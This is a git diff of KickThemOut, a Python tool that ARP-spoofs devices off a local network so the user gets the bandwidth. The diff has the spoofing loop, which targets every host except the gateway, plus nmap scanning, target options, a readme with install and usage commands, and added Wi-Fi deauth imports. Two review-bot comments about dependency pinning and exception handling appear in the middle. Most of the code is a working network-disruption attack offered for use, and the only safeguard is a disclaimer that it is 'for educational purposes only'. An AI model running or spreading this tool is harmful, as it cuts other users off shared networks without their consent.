stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("Target(s): ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + 
vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + # broadcast malicious ARP packets + reScan = 0 + while True: + for host in hostsList: + if host[0] != defaultGatewayIP: + # dodge gateway (avoid crashing network itself) + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) + reScan += 1 + if reScan == 4: + reScan = 0 + scanNetwork() + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + # broadcast ARP packets with legitimate info to restore connection + for host in hostsList: + if host[0] != defaultGatewayIP: + try: + # dodge gateway + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END)) + + + # script's main function def main(): # display heading heading() - print( - "\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}" - + defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, - RED, GREEN, RED, GREEN, END) - # display warning in case of no active hosts - if len(hostsList) == 0 or len(hostsList) == 1: - if len(hostsList) == 1: - if hostsList[0][0] == defaultGatewayIP: - print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format( - GREEN, RED, GREEN, 
RED, GREEN, END) - raise SystemExit - else: - print( - "\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format( - GREEN, RED, GREEN, RED, GREEN, END) - print( - "\n{0}If you are experiencing this error multiple times, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues\n{2}").format( - RED, BLUE, END) - raise SystemExit + if interactive: - try: - - while True: - - optionBanner() - - header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END)) - choice = raw_input(header) - - if choice.upper() == 'E' or choice.upper() == 'EXIT': - print('\n{0}Thanks for dropping by.' - '\nCatch ya later!{1}').format(GREEN, END) - raise SystemExit - elif choice == '1': - kickoneoff() - elif choice == '2': - kicksomeoff() - elif choice == '3': - kickalloff() - elif choice.upper() == 'CLEAR': - os.system("clear||cls") + print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> {}{}{} hosts are up.{}".format( + GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, str(len(hostsList)), GREEN, END)) + # display warning in case of no active hosts + if len(hostsList) == 0 or len(hostsList) == 1: + if len(hostsList) == 1: + if hostsList[0][0] == defaultGatewayIP: + print("\n{}{}WARNING: There are {}0 hosts up{} on you network except your gateway.\n\tYou can't kick anyone off {}:/{}\n".format( + GREEN, RED, GREEN, RED, GREEN, END)) + os._exit(1) else: - print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END) + print( + "\n{}{}WARNING: There are {}0 hosts{} up on you network.\n\tIt looks like something went wrong {}:/{}".format( + GREEN, RED, GREEN, RED, GREEN, END)) + print( + "\n{}If you are experiencing this error multiple times, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n{}".format( + RED, BLUE, END)) + os._exit(1) + + else: + + print("\n{}Using interface '{}{}{}' with MAC 
address '{}{}{}'.\nGateway IP: '{}{}{}' --> Target(s): '{}{}{}'.{}".format( + GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, ", ".join(options.targets), GREEN, END)) + + if options.targets is None and options.scan is False: + + try: + + while True: + + optionBanner() + + header = ('{}kickthemout{}> {}'.format(BLUE, WHITE, END)) + choice = input(header) + + if choice.upper() == 'E' or choice.upper() == 'EXIT': + shutdown() + + elif choice == '1': + kickoneoff() + + elif choice == '2': + kicksomeoff() + + elif choice == '3': + kickalloff() + + elif choice.upper() == 'CLEAR': + os.system("clear||cls") + else: + print("\n{}ERROR: Please select a valid option.{}\n".format(RED, END)) + + except KeyboardInterrupt: + shutdown() + + elif options.scan is not False: + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("\nOnline IPs: ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + else: + + nonInteractiveAttack() + - except KeyboardInterrupt: - print('\n\n{0}Thanks for dropping by.' 
- '\nCatch ya later!{1}').format(GREEN, END) if __name__ == '__main__': - os.system("clear||cls") + + # implement option parser + optparse.OptionParser.format_epilog = lambda self, formatter: self.epilog + + version = '2.0' + examples = ('\nExamples:\n'+ + ' sudo python3 kickthemout.py --target 192.168.1.10 \n'+ + ' sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30\n'+ + ' sudo python3 kickthemout.py -s\n'+ + ' sudo python3 kickthemout.py (interactive mode)\n') + + parser = optparse.OptionParser(epilog=examples, + usage='sudo python3 %prog [options]', + prog='kickthemout.py', version=('KickThemOut ' + version)) + + parser.add_option('-p', '--packets', action='store', + dest='packets', help='number of packets broadcasted per minute (default: 6)') + + parser.add_option('-s', '--scan', action='store_true', default=False, + dest='scan', help='perform a quick network scan and exit') + + def targetList(option, opt, value, parser): + setattr(parser.values, option.dest, value.split(',')) + parser.add_option('-t', '--target', action='callback', + callback=targetList, type='string', + dest='targets', help='specify target IP address(es) and perform attack') + + (options, argv) = parser.parse_args() + + try: + if checkInternetConnection(): + pass + else: + print("\n{}ERROR: It seems that you are offline. 
Please check your internet connection.{}\n".format(RED, END)) + os._exit(1) + except KeyboardInterrupt: + shutdown() # configure appropriate network info - sys.stdout.write("{0}Scanning your network, hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - defaultInterface = getDefaultInterface() - defaultGatewayIP = getGatewayIP() - defaultInterfaceMac = getDefaultInterfaceMAC() - global defaultGatewayMacSet - defaultGatewayMacSet = False + try: + defaultInterface = getDefaultInterface() + defaultGatewayIP = getGatewayIP() + defaultInterfaceMac = getDefaultInterfaceMAC() + global defaultGatewayMacSet + defaultGatewayMacSet = False + except KeyboardInterrupt: + shutdown() - # commence scanning process - scanNetwork() - main() + if (options.packets is not None and (options.packets).isdigit()) or options.packets is None: + pass + else: + print("\n{}ERROR: Argument for number of packets broadcasted per minute must be an integer {}(e.g. {}--packet 60{}).\n".format(RED, END, BLUE, END)) + os._exit(1) + + if options.targets is None: + # set to interactive attack + interactive = True + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + else: + # set to non-interactive attack + interactive = False + + main() \ No newline at end of file diff --git a/readme.md b/readme.md new file mode 100644 index 0000000..9691786 --- /dev/null +++ b/readme.md 
@@ -0,0 +1,142 @@ +![KickThemOut Logo](http://nikolaskama.me/content/images/2017/02/kickthemout_small.png) + +# KickThemOut + +> [KickThemOut](https://nikolaskama.me/kickthemoutproject) - **Kick Devices Off Your Network** + +A tool to kick devices out of your network and enjoy all the bandwidth for yourself. +It allows you to select specific or all devices and ARP spoofs them off your local area network. + +- Compatible with Python **3+**🎉. + +- *Not* compatible with Windows. + +Authors: [Nikolaos Kamarinakis](mailto:nikolaskam@gmail.com) & [David Schütz](mailto:xdavid@protonmail.com). + +[![Build Badge](https://travis-ci.org/k4m4/kickthemout.svg?branch=master)](https://travis-ci.org/k4m4/kickthemout) +[![License Badge](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/k4m4/kickthemout/blob/master/LICENSE) +[![GitHub Stars](https://img.shields.io/github/stars/k4m4/kickthemout.svg)](https://github.com/k4m4/kickthemout/stargazers) + +------------- + +# Installation + +## Debian Installation + +You can download KickThemOut by cloning the [Git Repo](https://github.com/k4m4/kickthemout) and simply installing its requirements: + +``` +~ ❯❯❯ sudo apt-get update && sudo apt-get install nmap + +~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git + +~ ❯❯❯ cd kickthemout/ + +~/kickthemout ❯❯❯ sudo -H pip3 install -r requirements.txt + +~/kickthemout ❯❯❯ sudo python3 kickthemout.py +``` + + +## MacOS Installation + +If you would like to install KickThemOut on a Mac, please run the following: + +``` +~ ❯❯❯ brew install libdnet + +~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git + +~ ❯❯❯ cd kickthemout/ + +~/kickthemout ❯❯❯ sudo -H pip3 install -r requirements.txt + +~/kickthemout ❯❯❯ sudo python3 kickthemout.py +``` + +**NOTE**: You need to have [Homebrew](http://brew.sh/) installed before running the Mac OS installation. + +Also, **keep in mind** that you might be asked to run some commands after executing the 2nd last command. 
+ + +## Arch Installation + +You can download KickThemOut on an Arch based system by executing the following: + +``` +~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git + +~ ❯❯❯ cd kickthemout/ + +~ ❯❯❯ sudo -H pip3 install -r requirements.txt + +~/kickthemout ❯❯❯ sudo python3 kickthemout.py +``` + +
+ +# Usage + +``` +Usage: sudo python3 kickthemout.py [options] + +Options: + --version show program's version number and exit + -h, --help show this help message and exit + -p PACKETS, --packets=PACKETS + number of packets broadcasted per minute (default: 6) + -s, --scan perform a quick network scan and exit + -t TARGETS, --target=TARGETS + specify target IP address(es) and perform attack + +Examples: + sudo python3 kickthemout.py --target 192.168.1.10 + sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30 + sudo python3 kickthemout.py (interactive mode) +``` + +To view all available options run: + +``` +~/kickthemout ❯❯❯ sudo python3 kickthemout.py -h +``` + + +
+ +# Demo + +Here's a short demo: + +[![Asciinema Demo](https://nikolaskama.me/content/images/2017/01/kickthemout_asciinema.png)](https://asciinema.org/a/98200?autoplay=1&loop=1) + +(For more demos click [here](https://asciinema.org/~k4m4)) + + +
+ +# Developers + +* Nikolaos Kamarinakis - [@nikolaskama](https://twitter.com/nikolaskama) +* David Schütz - [@xdavidhu](https://twitter.com/xdavidhu) + + +
+ +# Disclaimer + +KickThemOut is provided as is under the MIT Licence (as stated below). +It is built for educational purposes *only*. If you choose to use it otherwise, the developers will not be held responsible. Please, do not use it with evil intent. + + +
+ +# License + +Copyright (c) 2017-18 by [Nikolaos Kamarinakis](mailto:nikolaskam@gmail.com) & [David Schütz](mailto:xdavid@protonmail.com). Some rights reserved. + +KickThemOut is under the terms of the [MIT License](https://www.tldrlegal.com/l/mit), following all clarifications stated in the [license file](https://raw.githubusercontent.com/k4m4/kickthemout/master/LICENSE). + + +For more information head over to the [official project page](https://nikolaskama.me/kickthemoutproject). +You can also go ahead and email me anytime at **nikolaskam{at}gmail{dot}com** or David at **xdavid{at}protonmail{dot}com**. \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index 751c072..489a5ac 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,2 +1,3 @@ -scapy -python-nmap \ No newline at end of file +scapy-python3 +python-nmap +netifaces \ No newline at end of file diff --git a/scan.py b/scan.py index e57354c..d7d08ec 100644 --- a/scan.py +++ b/scan.py @@ -1,21 +1,25 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -.- coding: utf-8 -.- # scan.py -# authors: k4m4 & xdavidhu +""" +Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) +""" + +import nmap + +# perform a network scan with nmap def scanNetwork(network): - # Function for performing a network scan with nmap with the help of the python-nmap module returnlist = [] - import nmap nm = nmap.PortScanner() - a = nm.scan(hosts=network, arguments='-sP') + a = nm.scan(hosts=network, arguments='-sn') - for k, v in a['scan'].iteritems(): + for k, v in a['scan'].items(): if str(v['status']['state']) == 'up': try: returnlist.append([str(v['addresses']['ipv4']), str(v['addresses']['mac'])]) except: pass - # returnlist = hostsList array return returnlist diff --git a/spoof.py b/spoof.py index dea1a5c..8a8872f 100644 --- a/spoof.py +++ b/spoof.py 
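Review bot: None of the three entries in the new `requirements.txt` (`scapy-python3`, `python-nmap`, `netifaces`) is pinned to a version. The readme added in this commit installs them with `sudo -H pip3 install -r requirements.txt` and then runs the tool under `sudo`, so whichever release the index serves at install time ends up executing as root. Pin each entry to the version this release was tested against, for example `python-nmap==<tested version>`, and consider adding `--hash=sha256:<digest>` entries so that `pip3 install --require-hashes -r requirements.txt` rejects a substituted package. The Travis job added in `.travis.yml` installs from the same file, so CI would then exercise exactly the pinned set.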
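Review bot: The bare `except: pass` kept in the loop of `scanNetwork` swallows every exception, including `KeyboardInterrupt`, which the rest of this commit routes to `shutdown()`. It appears to be there for hosts whose nmap record lacks an `ipv4` or `mac` entry, although the hunk does not say so. Narrowing it to `except KeyError: continue` would keep that behaviour while letting Ctrl-C and genuine errors surface. A one-line comment such as `# hosts reported without a MAC (e.g. the scanning machine itself) are skipped` would record why entries can go missing from the returned list.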
@@ -1,10 +1,9 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -.- coding: utf-8 -.- # spoof.py -# authors: k4m4 & xdavidhu """ -Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ @@ -15,11 +14,15 @@ from scapy.all import ( getmacbyip, ARP, Ether, - sendp + sendp, + conf, + RadioTap, + Dot11, + Dot11Deauth ) +# send malicious ARP packets def sendPacket(my_mac, gateway_ip, target_ip, target_mac): - # Function for sending the malicious ARP packets out with the specified data ether = Ether() ether.src = my_mac